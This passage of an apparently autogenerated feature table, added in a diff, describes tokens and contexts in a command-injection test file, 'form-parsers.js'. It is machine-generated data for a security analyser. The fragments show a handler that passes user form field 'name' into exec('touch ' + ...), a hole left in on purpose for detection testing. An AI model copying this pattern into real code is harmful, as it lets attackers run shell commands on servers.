name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:26:32:28 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:31:32:33 | res | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:31:32:33 | res | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:31:32:33 | res | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:31:32:33 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:31:32:33 | res | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:36:32:39 | next | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:36:32:39 | next | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:36:32:39 | next | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:36:32:39 | next | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:32:36:32:39 | next | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:10 | form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:10 | form | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:10 | form | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:10 | form | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:10 | form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form = ... true }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form = ... true }) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form = ... true }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form = ... true }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:7:33:44 | form = ... true }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:23 | formidable | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:23 | formidable | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:23 | formidable | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:23 | formidable | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:23 | formidable | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | exceptional return of formida ... true }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | exceptional return of formida ... true }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | exceptional return of formida ... true }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | exceptional return of formida ... true }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | exceptional return of formida ... true }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:14:33:44 | formida ... true }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | CalleeFlexibleAccessPath | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | calleeImports | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:25:33:43 | { multiples: true } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:35 | multiples | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:35 | multiples | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:35 | multiples | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:35 | multiples | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:35 | multiples | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:27:33:41 | multiples: true | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | CalleeFlexibleAccessPath | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | InputAccessPathFromCallee | 0.multiples | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | assignedToPropName | multiples | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | calleeImports | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:33:38:33:41 | true | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:6 | form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:6 | form | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:6 | form | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:6 | form | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:6 | form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:12 | form.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:12 | form.parse | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:12 | form.parse | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:12 | form.parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:35:12 | form.parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | exceptional return of form.pa ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | exceptional return of form.pa ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | exceptional return of form.pa ... OK\\n }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | exceptional return of form.pa ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | exceptional return of form.pa ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:3:37:4 | form.pa ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:8:35:12 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:8:35:12 | parse | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:8:35:12 | parse | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:8:35:12 | parse | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:8:35:12 | parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | CalleeFlexibleAccessPath | form.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | calleeImports | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | contextSurroundingFunctionParameters | (req, res, next) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:14:35:16 | req | receiverName | form | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:35:18 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:35:18 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:35:18 | exec | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:35:18 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:35:18 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | CalleeFlexibleAccessPath | form.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | calleeImports | formidable | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | (err, f ... OK\\n } | receiverName | form | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | exceptional return of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | return of anonymous function | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:19:37:3 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:20:35:22 | err | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:20:35:22 | err | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:20:35:22 | err | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:20:35:22 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:20:35:22 | err | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:25:35:30 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:33:35:37 | files | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:33:35:37 | files | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:33:35:37 | files | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:33:35:37 | files | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:35:33:35:37 | files | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:8 | exec | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:8 | exec | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:8 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exceptional return of exec("t ... s.name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exceptional return of exec("t ... s.name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exceptional return of exec("t ... s.name) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exceptional return of exec("t ... s.name) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exceptional return of exec("t ... s.name) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) | enclosingFunctionBody | req res next form formidable multiples true form parse req err fields files exec touch fields name form2 formidable IncomingForm form2 parse req err fields files exec touch fields name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:5:36:32 | exec("t ... s.name) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:17 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:36:10:36:17 | "touch " | contextSurroundingFunctionParameters | (req, res, next)\n(err, fields, files) | 